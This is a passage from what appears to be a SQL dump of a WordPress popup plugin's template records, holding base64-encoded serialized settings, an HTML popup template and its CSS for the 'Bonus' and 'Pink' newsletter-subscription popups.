X3NtX3R3aXR0ZXIiO3M6MToiMSI7czo5OiJzbV9kZXNpZ24iO3M6Njoic2ltcGxlIjtzOjg6ImFuaW1fa2V5IjtzOjQ6Im5vbmUiO3M6MTM6ImFuaW1fZHVyYXRpb24iO3M6MDoiIjtzOjEzOiJlbmJfc3Vic2NyaWJlIjtzOjE6IjEiO3M6ODoic3ViX2Rlc3QiO3M6OToid29yZHByZXNzIjtzOjIzOiJzdWJfd3BfY3JlYXRlX3VzZXJfcm9sZSI7czoxMDoic3Vic2NyaWJlciI7czoxOToic3ViX2F3ZWJlcl9saXN0bmFtZSI7czowOiIiO3M6MjE6InN1Yl9hd2ViZXJfYWR0cmFja2luZyI7czowOiIiO3M6MjE6InN1Yl9tYWlsY2hpbXBfYXBpX2tleSI7czowOiIiO3M6MjU6InN1Yl9tYWlsY2hpbXBfZ3JvdXBzX2Z1bGwiO3M6MDoiIjtzOjE0OiJzdWJfZ3JfYXBpX2tleSI7czowOiIiO3M6MTY6InN1Yl9ncl9jeWNsZV9kYXkiO3M6MToiMCI7czoxMzoic3ViX2ljX2FwcF9pZCI7czowOiIiO3M6MTU6InN1Yl9pY19hcHBfdXNlciI7czowOiIiO3M6MTU6InN1Yl9pY19hcHBfcGFzcyI7czowOiIiO3M6MTQ6InN1Yl9hY19hcGlfdXJsIjtzOjA6IiI7czoxNDoic3ViX2FjX2FwaV9rZXkiO3M6MDoiIjtzOjE4OiJzdWJfYXJfZm9ybV9hY3Rpb24iO3M6MDoiIjtzOjEwOiJzdWJfc2dhX2lkIjtzOjA6IiI7czoxNToic3ViX3NnYV9saXN0X2lkIjtzOjA6IiI7czoyMToic3ViX3NnYV9hY3RpdmF0ZV9jb2RlIjtzOjA6IiI7czoxMzoic3ViX3NmX2FwcF9pZCI7czowOiIiO3M6MTQ6InN1Yl9ja19hcGlfa2V5IjtzOjA6IiI7czoxNDoic3ViX21lbV9hY2NfaWQiO3M6MDoiIjtzOjE1OiJzdWJfbWVtX3B1ZF9rZXkiO3M6MDoiIjtzOjE2OiJzdWJfbWVtX3ByaXZfa2V5IjtzOjA6IiI7czoxMDoic3ViX2ZpZWxkcyI7YToyOntzOjQ6Im5hbWUiO2E6Nzp7czozOiJlbmIiO3M6MToiMSI7czo0OiJuYW1lIjtzOjQ6Im5hbWUiO3M6NDoiaHRtbCI7czo0OiJ0ZXh0IjtzOjU6ImxhYmVsIjtzOjQ6Ik5hbWUiO3M6NToidmFsdWUiO3M6MDoiIjtzOjY6ImN1c3RvbSI7czoxOiIwIjtzOjk6Im1hbmRhdG9yeSI7czoxOiIwIjt9czo1OiJlbWFpbCI7YTo3OntzOjQ6Im5hbWUiO3M6NToiZW1haWwiO3M6NDoiaHRtbCI7czo0OiJ0ZXh0IjtzOjU6ImxhYmVsIjtzOjY6IkUtTWFpbCI7czo1OiJ2YWx1ZSI7czowOiIiO3M6NjoiY3VzdG9tIjtzOjE6IjAiO3M6OToibWFuZGF0b3J5IjtzOjE6IjEiO3M6MzoiZW5iIjtzOjE6IjEiO319czoyMDoic3ViX3R4dF9jb25maXJtX3NlbnQiO3M6Njc6IkNvbmZpcm1hdGlvbiBsaW5rIHdhcyBzZW50IHRvIHlvdXIgZW1haWwgYWRkcmVzcy4gQ2hlY2sgeW91ciBlbWFpbCEiO3M6MTU6InN1Yl90eHRfc3VjY2VzcyI7czoyNDoiVGhhbmsgeW91IGZvciBzdWJzY3JpYmUhIjtzOjIxOiJzdWJfdHh0X2ludmFsaWRfZW1haWwiO3M6MjI6IkVtcHR5IG9yIGludmFsaWQgZW1haWwiO3M6MjA6InN1Yl90eHRfZXhpc3RzX2VtYWlsIjtzOjIyOiJFbXB0eSBvciBpbnZhbGlkIGVtYWlsIjtzOjE2OiJzdWJfcmVkaXJlY3RfdXJsIjtzOjA6IiI7czoyODoic3ViX3R4dF9jb25maXJtX21haWxfc3ViamVjdCI7czozNDoiQ29uZmlybSBzdWJzY3JpcHRpb24gb24gW3NpdGVuYW1lXSI7czoyNToic3ViX3R4dF9jb25maXJtX21haWxfZnJvbSI7czoxNDoiYWRtaW5AbWFpbC5jb20iO3M6Mjg6InN1Yl90eHRfY29uZmlybV9tYWlsX21lc3NhZ2UiO3M6MTk3OiJZb3Ugc3Vic2NyaWJlZCBvbiBzaXRlIDxhIGhyZWY9XCJbc2l0ZXVybF1cIj5bc2l0ZW5hbWVdPC9hPi4gRm9sbG93IDxhIGhyZWY9XCJbY29uZmlybV9saW5rXVwiPnRoaXMgbGluazwvYT4gdG8gY29tcGxldGUgeW91ciBzdWJzY3JpcHRpb24uIElmIHlvdSBkaWQgbm90IHN1YnNjcmliZSBoZXJlIC0ganVzdCBpZ25vcmUgdGhpcyBtZXNzYWdlLiI7czozMToic3ViX3R4dF9zdWJzY3JpYmVyX21haWxfc3ViamVjdCI7czozNzoiW3NpdGVuYW1lXSBZb3VyIHVzZXJuYW1lIGFuZCBwYXNzd29yZCI7czoyODoic3ViX3R4dF9zdWJzY3JpYmVyX21haWxfZnJvbSI7czoxNDoiYWRtaW5AbWFpbC5jb20iO3M6MzE6InN1Yl90eHRfc3Vic2NyaWJlcl9tYWlsX21lc3NhZ2UiO3M6NjU6IlVzZXJuYW1lOiBbdXNlcl9sb2dpbl08YnIgLz5QYXNzd29yZDogW3Bhc3N3b3JkXTxiciAvPltsb2dpbl91cmxdIjtzOjI1OiJzdWJfcmVkaXJlY3RfZW1haWxfZXhpc3RzIjtzOjA6IiI7czoxMzoic3ViX2J0bl9sYWJlbCI7czo5OiJTdWJzY3JpYmUiO3M6MTM6InN1Yl9uZXdfZW1haWwiO3M6MTQ6ImFkbWluQG1haWwuY29tIjtzOjE1OiJzdWJfbmV3X21lc3NhZ2UiO3M6MTI5OiJZb3UgaGF2ZSBuZXcgc3Vic2NyaWJlciBvbiB5b3VyIHNpdGUgPGEgaHJlZj1cIltzaXRldXJsXVwiPltzaXRlbmFtZV08L2E+LCBoZXJlIHVzIHN1YnNjcmliZXIgaW5mb3JtYXRpb246PGJyIC8+W3N1YnNjcmliZXJfZGF0YV0iO3M6ODoibG9naW5fYnkiO3M6ODoidXNlcm5hbWUiO3M6MTg6ImxvZ2luX3JlZGlyZWN0X3VybCI7czowOiIiO3M6MTU6ImxvZ2luX2J0bl9sYWJlbCI7czo1OiJMb2dpbiI7czoyMzoicmVnX3dwX2NyZWF0ZV91c2VyX3JvbGUiO3M6MTA6InN1YnNjcmliZXIiO3M6MTM6InJlZ19idG5fbGFiZWwiO3M6ODoiUmVnaXN0ZXIiO3M6MTA6InJlZ19maWVsZHMiO2E6Mjp7czo0OiJuYW1lIjthOjc6e3M6MzoiZW5iIjtzOjE6IjEiO3M6NDoibmFtZSI7czo0OiJuYW1lIjtzOjQ6Imh0bWwiO3M6NDoidGV4dCI7czo1OiJsYWJlbCI7czo0OiJOYW1lIjtzOjU6InZhbHVlIjtzOjA6IiI7czo2OiJjdXN0b20iO3M6MToiMCI7czo5OiJtYW5kYXRvcnkiO3M6MToiMCI7fXM6NToiZW1haWwiO2E6Nzp7czo0OiJuYW1lIjtzOjU6ImVtYWlsIjtzOjQ6Imh0bWwiO3M6NDoidGV4dCI7czo1OiJsYWJlbCI7czo2OiJFLU1haWwiO3M6NToidmFsdWUiO3M6MDoiIjtzOjY6ImN1c3RvbSI7czoxOiIwIjtzOjk6Im1hbmRhdG9yeSI7czoxOiIxIjtzOjM6ImVuYiI7czoxOiIxIjt9fXM6MjA6InJlZ190eHRfY29uZmlybV9zZW50IjtzOjY3OiJDb25maXJtYXRpb24gbGluayB3YXMgc2VudCB0byB5b3VyIGVtYWlsIGFkZHJlc3MuIENoZWNrIHlvdXIgZW1haWwhIjtzOjE1OiJyZWdfdHh0X3N1Y2Nlc3MiO3M6Mjc6IlRoYW5rIHlvdSBmb3IgcmVnaXN0cmF0aW9uISI7czoyMToicmVnX3R4dF9pbnZhbGlkX2VtYWlsIjtzOjIyOiJFbXB0eSBvciBpbnZhbGlkIGVtYWlsIjtzOjE2OiJyZWdfcmVkaXJlY3RfdXJsIjtzOjA6IiI7czoyODoicmVnX3R4dF9jb25maXJtX21haWxfc3ViamVjdCI7czozNDoiQ29uZmlybSByZWdpc3RyYXRpb24gb24gW3NpdGVuYW1lXSI7czoyNToicmVnX3R4dF9jb25maXJtX21haWxfZnJvbSI7czoxNDoiYWRtaW5AbWFpbC5jb20iO3M6Mjg6InJlZ190eHRfY29uZmlybV9tYWlsX21lc3NhZ2UiO3M6MTk2OiJZb3UgcmVnaXN0ZXJlZCBvbiBzaXRlIDxhIGhyZWY9XCJbc2l0ZXVybF1cIj5bc2l0ZW5hbWVdPC9hPi4gRm9sbG93IDxhIGhyZWY9XCJbY29uZmlybV9saW5rXVwiPnRoaXMgbGluazwvYT4gdG8gY29tcGxldGUgeW91ciByZWdpc3RyYXRpb24uIElmIHlvdSBkaWQgbm90IHJlZ2lzdGVyIGhlcmUgLSBqdXN0IGlnbm9yZSB0aGlzIG1lc3NhZ2UuIjtzOjMxOiJyZWdfdHh0X3N1YnNjcmliZXJfbWFpbF9zdWJqZWN0IjtzOjM3OiJbc2l0ZW5hbWVdIFlvdXIgdXNlcm5hbWUgYW5kIHBhc3N3b3JkIjtzOjI4OiJyZWdfdHh0X3N1YnNjcmliZXJfbWFpbF9mcm9tIjtzOjE0OiJhZG1pbkBtYWlsLmNvbSI7czozMToicmVnX3R4dF9zdWJzY3JpYmVyX21haWxfbWVzc2FnZSI7czo2NToiVXNlcm5hbWU6IFt1c2VyX2xvZ2luXTxiciAvPlBhc3N3b3JkOiBbcGFzc3dvcmRdPGJyIC8+W2xvZ2luX3VybF0iO3M6MTM6InJlZ19uZXdfZW1haWwiO3M6MTQ6ImFkbWluQG1haWwuY29tIjtzOjE1OiJyZWdfbmV3X21lc3NhZ2UiO3M6MTIxOiJZb3UgaGF2ZSBuZXcgbWVtYmVyIG9uIHlvdXIgc2l0ZSA8YSBocmVmPVwiW3NpdGV1cmxdXCI+W3NpdGVuYW1lXTwvYT4sIGhlcmUgdXMgbWVtYmVyIGluZm9ybWF0aW9uOjxiciAvPltzdWJzY3JpYmVyX2RhdGFdIjtzOjU6InR4dF8wIjtzOjQzMzoiPHA+Qm9udXMgUG9wdXAgaXQgaXMgdGhlIG1vc3QgcG93ZXJmdWwgcG9wdXAgc3lzdGVtIGZvciBXb3JkUHJlc3Mgb24gdGhlIG1hcmtldC4gSXQgY29tYmluZXMgYSBwcm9mZXNzaW9uYWxseSBkZXNpZ25lZCB3ZWxjb21lL2V4aXQgd2luZG93IHNvY2lhbCBsb2NrZXIgYW5kIHN1YnNjcmliaW5nIG9wdC1pbiBzeXN0ZW0gZm9yIHNtYXJ0IGUtbWFpbCBtYXJrZXRpbmcuPC9wPjx1bD48bGk+V2VsY29tZSwgZXhpdCBwb3B1cCB3aW5kb3c8L2xpPjxsaT5Tb2NpYWwgbmV0d29yayBzaGFyaW5nIGxvY2tlcjwvbGk+PGxpPlNtYXJ0IG5ld3NsZXR0ZXIgb3B0LWluIHN5c3RlbTwvbGk+PGxpPkZ1bGwgcG9wdXAgd2luZG93IGN1c3RvbWl6aW5nPC9saT48bGk+UGFnZSBsZXZlbCBUYXJnZXRpbmc8L2xpPjxsaT5NYW55IGxheW91dHMgdG8gY2hvb3NlPC9saT48L3VsPiI7fXM6MTA6Im9wdHNfYXR0cnMiO2E6Mjp7czo5OiJiZ19udW1iZXIiO3M6MToiNCI7czoxNjoidHh0X2Jsb2NrX251bWJlciI7czoxOiIxIjt9fQ==','<div id=\"ppsPopupShell_[ID]\" class=\"ppsPopupShell ppsPopupListsShell\">\r\n	<a href=\"#\" class=\"ppsPopupClose\"></a>\r\n	<div class=\"ppsPopupListsInner\">\r\n		<div class=\"ppsPopupTblCols\">\r\n			<div class=\"ppsPopupLeftCol\">\r\n				[if enb_label]\r\n					<div class=\"ppsPopupLabel\">[label]</div>\r\n				[endif]\r\n				[if enb_txt_0]\r\n					<div class=\"ppsPopupTxt ppsPopupTxt_0\">[txt_0]</div>\r\n				[endif]\r\n			</div>\r\n			<div class=\"ppsPopupRightCol\">\r\n				<div class=\"ppsBigArrow\"></div>\r\n				[if bg_type_2 == \'img\']\r\n					<img src=\"[bg_img_2]\" />\r\n				[endif]\r\n				[if enb_subscribe]\r\n					<div class=\"ppsSubscribeShell\">\r\n						[sub_form_start]\r\n						[sub_fields_html]\r\n						<input type=\"submit\" name=\"submit\" value=\"[sub_btn_label]\" />\r\n						[sub_form_end]\r\n					</div>\r\n				[endif]\r\n				[if enb_sm]\r\n					<div class=\"ppsSm\">\r\n					[sm_html]\r\n					</div>\r\n				[endif]\r\n				[if enb_foot_note]\r\n					<div class=\"ppsFootNote\">\r\n					[foot_note]\r\n					</div>\r\n				[endif]\r\n			</div>\r\n		</div>\r\n	</div>\r\n</div>','#ppsPopupShell_[ID] {\r\n	width: [width][width_measure];\r\n  	font-family: Helvetica,Arial,sans-serif;\r\n  	font-size: 14px;\r\n  	[if bg_type_0 == \'img\']\r\n  	background-image: url(\"[bg_img_0]\");\r\n  	background-repeat: no-repeat;\r\n  	background-size: cover;\r\n  	[endif]\r\n}\r\n#ppsPopupShell_[ID], #ppsPopupShell_[ID] * {\r\n	-webkit-box-sizing: content-box;\r\n	-moz-box-sizing:    content-box;\r\n	box-sizing:         content-box;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupLabel {\r\n	color: [bg_color_1];\r\n    font-size: 25px;\r\n    font-weight: bold;\r\n	line-height: 1.2;\r\n	text-align: center;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupListsInner {\r\n  	border: 3px solid #bac0ac;\r\n	border-radius: 8px;\r\n	-webkit-border-radius: 8px;\r\n	-moz-border-radius: 8px;\r\n  	-webkit-box-shadow: inset 0 0 0 5px #fff, 0 10px 25px rgba(0,0,0,0.5);\r\n	-moz-box-shadow: inset 0 0 0 5px #fff, 0 10px 25px rgba(0,0,0,0.5);\r\n	box-shadow: inset 0 0 0 5px #fff, 0 10px 25px rgba(0,0,0,0.5);\r\n  	[if bg_type_0 == \'color\']\r\n    background: {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }}; /* Old browsers */\r\n    background: -moz-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%, [bg_color_0] 100%); /* FF3.6+ */\r\n    background: -webkit-gradient(radial, center center, 0px, center center, 100%, color-stop(0%,{{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }}), color-stop(100%,[bg_color_0])); /* Chrome,Safari4+ */\r\n    background: -webkit-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%,[bg_color_0] 100%); /* Chrome10+,Safari5.1+ */\r\n    background: -o-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%,[bg_color_0] 100%); /* Opera 12+ */\r\n    background: -ms-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%,[bg_color_0] 100%); /* IE10+ */\r\n    background: radial-gradient(ellipse at center, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%,[bg_color_0] 100%); /* W3C */\r\n    filter: progid:DXImageTransform.Microsoft.gradient( startColorstr=\'{{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }}\', endColorstr=\'#eaeaea\',GradientType=1 ); /* IE6-9 fallback on horizontal gradient */\r\n  	[endif]\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupTxt_0 .ppsTxtContent {\r\n	padding: 10px 10px 10px 50px;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupTblCols {\r\n	display: table;\r\n  	padding: 10px 10px 10px 30px;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupLeftCol {\r\n	display: table-cell;\r\n  	[if enb_subscribe]\r\n  	width: 60%;\r\n  	[else]\r\n  	width: 60%;\r\n  	min-height: 60%;\r\n  	[endif]\r\n  	vertical-align: top;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupRightCol {\r\n  	width: 36%;\r\n	display: table-cell;\r\n  	border: 3px solid [bg_color_1];\r\n  	border-radius: 8px;\r\n	-moz-border-radius: 8px;\r\n	-webkit-border-radius: 8px;\r\n  	margin: 8px 5px 5px 5px;\r\n  	text-align: center;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell form {\r\n	padding: 30px 20px 0;\r\n  	text-align: center;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input,\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelect,\r\n#ppsPopupShell_[ID] .ppsSubscribeShell textarea {\r\n	width: 100%;\r\n  	margin-bottom: 10px;\r\n  	height: 35px;\r\n  	border-radius: 50px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=text],#ppsPopupShell_[ID] .ppsSubscribeShell input[type=email],#ppsPopupShell_[ID] .ppsSubscribeShell input[type=password],#ppsPopupShell_[ID] .ppsSubscribeShell input[type=email],\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelect,\r\n#ppsPopupShell_[ID] .ppsSubscribeShell textarea {\r\n	box-shadow: 0px [bg_color_1] inset;\r\n  	padding-left: 10px;\r\n  	font-size: 17px;\r\n  	background: [bg_color_1];\r\n  	border: 1px solid transparent;\r\n  	color: #fff;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelect {\r\n	display: table;\r\n  	text-align: left;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelectLabel,\r\n#ppsPopupShell_[ID] .ppsSubscribeShell select {\r\n	display: table-cell;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelectLabel {\r\n	opacity: 0.5;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell select {\r\n	width: 100%;\r\n  	background-color: transparent;\r\n  	height: 40px;\r\n  	border: none;\r\n  	font-size: 17px;\r\n  	color: #fff;\r\n  	margin-left: -15px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell textarea {\r\n	font-family: inherit;\r\n  	height: auto;\r\n    padding: 20px 5px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=submit] {\r\n	border: none;\r\n  	[if bg_type_3 == \'color\']\r\n  	background: [bg_color_3];\r\n	background-image: none;\r\n  	[elseif bg_type_3 == \'img\']\r\n  	background-image: url(\"[bg_img_3]\");\r\n  	background-repeat: no-repeat;\r\n  	background-size: cover;\r\n  	[endif]\r\n  	color: #fff;\r\n    font-size: 20px;\r\n  	cursor: pointer;\r\n  	width:  auto;\r\n  	padding: 5px 10px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=submit]:hover {\r\n	opacity: 0.8;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupClose:hover {\r\n	opacity: 0.8;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupClose {\r\n	background-repeat: no-repeat;\r\n  	cursor: pointer;\r\n  	right: -5px;\r\n	top: 2px;\r\n}\r\n#ppsPopupShell_[ID] .ppsFootNote {\r\n  	[if enb_subscribe]\r\n    color: #979696;\r\n    font-family: \"Helvetica Neue\",Helvetica,Arial,sans-serif;\r\n    font-size: xx-small;\r\n    font-style: italic;\r\n    line-height: 14px;\r\n    text-align: left;\r\n  	margin-left: 10px;\r\n  	[else]\r\n  	margin-top: 10px;\r\n  	color: #979696;\r\n    font-family: \"Helvetica Neue\",Helvetica,Arial,sans-serif;\r\n    font-size: xx-small;\r\n    font-style: italic;\r\n    line-height: 14px;\r\n    text-align: left;\r\n    margin-left: 10px;\r\n  	[endif]\r\n}\r\n#ppsPopupShell_[ID] .ppsSm{\r\n[if enb_subscribe]\r\n  [else]\r\n  	margin-top: 130px;\r\n  	[endif]\r\n}\r\n#ppsPopupShell_[ID] li{\r\n	font-weight: bold;\r\n  	font-size: 13px;\r\n  	padding-top: 3px;\r\n	padding-bottom: 3px;\r\n  	color: #737E86;\r\n}','bonus.png',1,1,1,1,0,0,0,'2015-01-13 18:22:48',20,0),(16,'Pink',1,0,'YTozOntzOjQ6Im1haW4iO2E6MzA6e3M6Nzoic2hvd19vbiI7czo5OiJwYWdlX2xvYWQiO3M6MjM6InNob3dfb25fcGFnZV9sb2FkX2RlbGF5IjtzOjA6IiI7czoyNToic2hvd19vbl9jbGlja19vbl9lbF9kZWxheSI7czoxOiIwIjtzOjI3OiJzaG93X29uX3Njcm9sbF93aW5kb3dfZGVsYXkiO3M6MToiMCI7czozMzoic2hvd19vbl9zY3JvbGxfd2luZG93X3BlcmNfc2Nyb2xsIjtzOjE6IjAiO3M6Mjg6InNob3dfb25fYWZ0ZXJfaW5hY3RpdmVfdmFsdWUiO3M6MjoiMTAiO3M6MjU6InNob3dfb25fbGlua19mb2xsb3dfZGVsYXkiO3M6MToiMCI7czo4OiJjbG9zZV9vbiI7czoxMDoidXNlcl9jbG9zZSI7czoyNjoiY2xvc2Vfb25fYWZ0ZXJfYWN0aW9uX3RpbWUiO3M6MToiMSI7czoyNToiY2xvc2Vfb25fYWZ0ZXJfdGltZV92YWx1ZSI7czoxOiI1IjtzOjEwOiJzaG93X3BhZ2VzIjtzOjM6ImFsbCI7czoxNDoic2hvd190aW1lX2Zyb20iO3M6NzoiMTI6MDBhbSI7czoxMjoic2hvd190aW1lX3RvIjtzOjc6IjEyOjAwYW0iO3M6MTQ6InNob3dfZGF0ZV9mcm9tIjtzOjA6IiI7czoxMjoic2hvd19kYXRlX3RvIjtzOjA6IiI7czo3OiJzaG93X3RvIjtzOjg6ImV2ZXJ5b25lIjtzOjI5OiJzaG93X3RvX2ZpcnN0X3RpbWVfdmlzaXRfZGF5cyI7czoyOiIzMCI7czozMDoic2hvd190b191bnRpbF9tYWtlX2FjdGlvbl9kYXlzIjtzOjI6IjMwIjtzOjE1OiJjb3VudF90aW1lc19udW0iO3M6MToiMSI7czoxNToiY291bnRfdGltZXNfbWVzIjtzOjM6ImRheSI7czoyMToiaGlkZV9mb3JfZGV2aWNlc19zaG93IjtzOjE6IjAiO3M6MjQ6ImhpZGVfZm9yX3Bvc3RfdHlwZXNfc2hvdyI7czoxOiIwIjtzOjE3OiJoaWRlX2Zvcl9pcHNfc2hvdyI7czoxOiIwIjtzOjEyOiJoaWRlX2Zvcl9pcHMiO3M6MDoiIjtzOjIzOiJoaWRlX2Zvcl9jb3VudHJpZXNfc2hvdyI7czoxOiIwIjtzOjIzOiJoaWRlX2Zvcl9sYW5ndWFnZXNfc2hvdyI7czoxOiIwIjtzOjI0OiJoaWRlX3NlYXJjaF9lbmdpbmVzX3Nob3ciO3M6MToiMCI7czoxODoiaGlkZV9wcmVnX3VybF9zaG93IjtzOjE6IjAiO3M6MTM6ImhpZGVfcHJlZ191cmwiO3M6MDoiIjtzOjI0OiJoaWRlX2Zvcl91c2VyX3JvbGVzX3Nob3ciO3M6MToiMCI7fXM6MzoidHBsIjthOjk5OntzOjU6IndpZHRoIjtzOjM6IjYwMCI7czoxMzoid2lkdGhfbWVhc3VyZSI7czoyOiJweCI7czoxODoiYmdfb3ZlcmxheV9vcGFjaXR5IjtzOjM6IjAuNSI7czo5OiJiZ190eXBlXzAiO3M6NToiY29sb3IiO3M6ODoiYmdfaW1nXzAiO3M6Mzc6IltQUFNfQVNTRVRTX1VSTF1pbWcvYXNzZXRzL25hdHVyZS5qcGciO3M6MTA6ImJnX2NvbG9yXzAiO3M6NzoiIzY2NjY2NiI7czo5OiJiZ190eXBlXzEiO3M6NToiY29sb3IiO3M6ODoiYmdfaW1nXzEiO3M6MDoiIjtzOjEwOiJiZ19jb2xvcl8xIjtzOjc6IiNkMTEwY2IiO3M6OToiYmdfdHlwZV8yIjtzOjM6ImltZyI7czo4OiJiZ19pbWdfMiI7czo0MToiW1BQU19BU1NFVFNfVVJMXWltZy9hc3NldHMvbWFpbC13aGl0ZS5wbmciO3M6MTA6ImJnX2NvbG9yXzIiO3M6MDoiIjtzOjk6ImJnX3R5cGVfMyI7czo1OiJjb2xvciI7czo4OiJiZ19pbWdfMyI7czowOiIiO3M6MTA6ImJnX2NvbG9yXzMiO3M6NzoiI2QxMTBjYiI7czo5OiJiZ190eXBlXzQiO3M6NToiY29sb3IiO3M6ODoiYmdfaW1nXzQiO3M6MDoiIjtzOjEwOiJiZ19jb2xvcl80IjtzOjc6IiNjNmMzYzMiO3M6MTA6ImZvbnRfbGFiZWwiO3M6NzoiZGVmYXVsdCI7czoxNjoibGFiZWxfZm9udF9jb2xvciI7czo3OiIjYzZjM2MzIjtzOjEwOiJmb250X3R4dF8wIjtzOjc6ImRlZmF1bHQiO3M6MTc6InRleHRfZm9udF9jb2xvcl8wIjtzOjc6IiNjNmMzYzMiO3M6MTE6ImZvbnRfZm9vdGVyIjtzOjc6ImRlZmF1bHQiO3M6MTc6ImZvb3Rlcl9mb250X2NvbG9yIjtzOjc6IiNjNmMzYzMiO3M6MTc6InJlaWRyZWN0X29uX2Nsb3NlIjtzOjA6IiI7czo5OiJjbG9zZV9idG4iO3M6MTE6IndoaWxlX2Nsb3NlIjtzOjc6ImJ1bGxldHMiO3M6MTE6Imxpc3RzX2dyZWVuIjtzOjExOiJsYXllcmVkX3BvcyI7czozOiJ0b3AiO3M6OToiZW5iX2xhYmVsIjtzOjE6IjEiO3M6NToibGFiZWwiO3M6MjM6IlNVQlNDUklCRSBUTyBORVdTTEVUVEVSIjtzOjk6ImVuYl90eHRfMCI7czoxOiIxIjtzOjEzOiJlbmJfZm9vdF9ub3RlIjtzOjE6IjEiO3M6OToiZm9vdF9ub3RlIjtzOjU4OiJZb3VyIEluZm9ybWF0aW9uIHdpbGwgbmV2ZXIgYmUgc2hhcmVkIHdpdGggYW55IHRoaXJkIHBhcnR5IjtzOjE1OiJlbmJfc21fZmFjZWJvb2siO3M6MToiMSI7czoxNzoiZW5iX3NtX2dvb2dsZXBsdXMiO3M6MToiMSI7czoxNDoiZW5iX3NtX3R3aXR0ZXIiO3M6MToiMSI7czo5OiJzbV9kZXNpZ24iO3M6Njoic2ltcGxlIjtzOjE0OiJ1c2Vfc3NzX3Byal9pZCI7czoxOiIwIjtzOjg6ImFuaW1fa2V5IjtzOjQ6Im5vbmUiO3M6MTM6ImFuaW1fZHVyYXRpb24iO3M6MDoiIjtzOjEzOiJlbmJfc3Vic2NyaWJlIjtzOjE6IjEiO3M6ODoic3ViX2Rlc3QiO3M6OToid29yZHByZXNzIjtzOjIzOiJzdWJfd3BfY3JlYXRlX3VzZXJfcm9sZSI7czoxMDoic3Vic2NyaWJlciI7czoxOToic3ViX2F3ZWJlcl9saXN0bmFtZSI7czowOiIiO3M6MjE6InN1Yl9hd2ViZXJfYWR0cmFja2luZyI7czowOiIiO3M6MjE6InN1Yl9tYWlsY2hpbXBfYXBpX2tleSI7czowOiIiO3M6MjU6InN1Yl9tYWlsY2hpbXBfZ3JvdXBzX2Z1bGwiO3M6MDoiIjtzOjE0OiJzdWJfZ3JfYXBpX2tleSI7czowOiIiO3M6MTY6InN1Yl9ncl9jeWNsZV9kYXkiO3M6MToiMCI7czoxMzoic3ViX2ljX2FwcF9pZCI7czowOiIiO3M6MTU6InN1Yl9pY19hcHBfdXNlciI7czowOiIiO3M6MTU6InN1Yl9pY19hcHBfcGFzcyI7czowOiIiO3M6MTQ6InN1Yl9hY19hcGlfdXJsIjtzOjA6IiI7czoxNDoic3ViX2FjX2FwaV9rZXkiO3M6MDoiIjtzOjE4OiJzdWJfYXJfZm9ybV9hY3Rpb24iO3M6MDoiIjtzOjEwOiJzdWJfc2dhX2lkIjtzOjA6IiI7czoxNToic3ViX3NnYV9saXN0X2lkIjtzOjA6IiI7czoyMToic3ViX3NnYV9hY3RpdmF0ZV9jb2RlIjtzOjA6IiI7czoxMzoic3ViX3NmX2FwcF9pZCI7czowOiIiO3M6MTQ6InN1Yl9ja19hcGlfa2V5IjtzOjA6IiI7czoxNDoic3ViX21lbV9hY2NfaWQiO3M6MDoiIjtzOjE1OiJzdWJfbWVtX3B1ZF9rZXkiO3M6MDoiIjtzOjE2OiJzdWJfbWVtX3ByaXZfa2V5IjtzOjA6IiI7czoxMDoic3ViX2ZpZWxkcyI7YToyOntzOjQ6Im5hbWUiO2E6Nzp7czozOiJlbmIiO3M6MToiMSI7czo0OiJuYW1lIjtzOjQ6Im5hbWUiO3M6NDoiaHRtbCI7czo0OiJ0ZXh0IjtzOjU6ImxhYmVsIjtzOjQ6Ik5hbWUiO3M6NToidmFsdWUiO3M6MDoiIjtzOjY6ImN1c3RvbSI7czoxOiIwIjtzOjk6Im1hbmRhdG9yeSI7czoxOiIwIjt9czo1OiJlbWFpbCI7YTo3OntzOjQ6Im5hbWUiO3M6NToiZW1haWwiO3M6NDoiaHRtbCI7czo0OiJ0ZXh0IjtzOjU6ImxhYmVsIjtzOjY6IkUtTWFpbCI7czo1OiJ2YWx1ZSI7czowOiIiO3M6NjoiY3VzdG9tIjtzOjE6IjAiO3M6OToibWFuZGF0b3J5IjtzOjE6IjEiO3M6MzoiZW5iIjtzOjE6IjEiO319czoyMDoic3ViX3R4dF9jb25maXJtX3NlbnQiO3M6Njc6IkNvbmZpcm1hdGlvbiBsaW5rIHdhcyBzZW50IHRvIHlvdXIgZW1haWwgYWRkcmVzcy4gQ2hlY2sgeW91ciBlbWFpbCEiO3M6MTU6InN1Yl90eHRfc3VjY2VzcyI7czoyNDoiVGhhbmsgeW91IGZvciBzdWJzY3JpYmUhIjtzOjIxOiJzdWJfdHh0X2ludmFsaWRfZW1haWwiO3M6MjI6IkVtcHR5IG9yIGludmFsaWQgZW1haWwiO3M6MjA6InN1Yl90eHRfZXhpc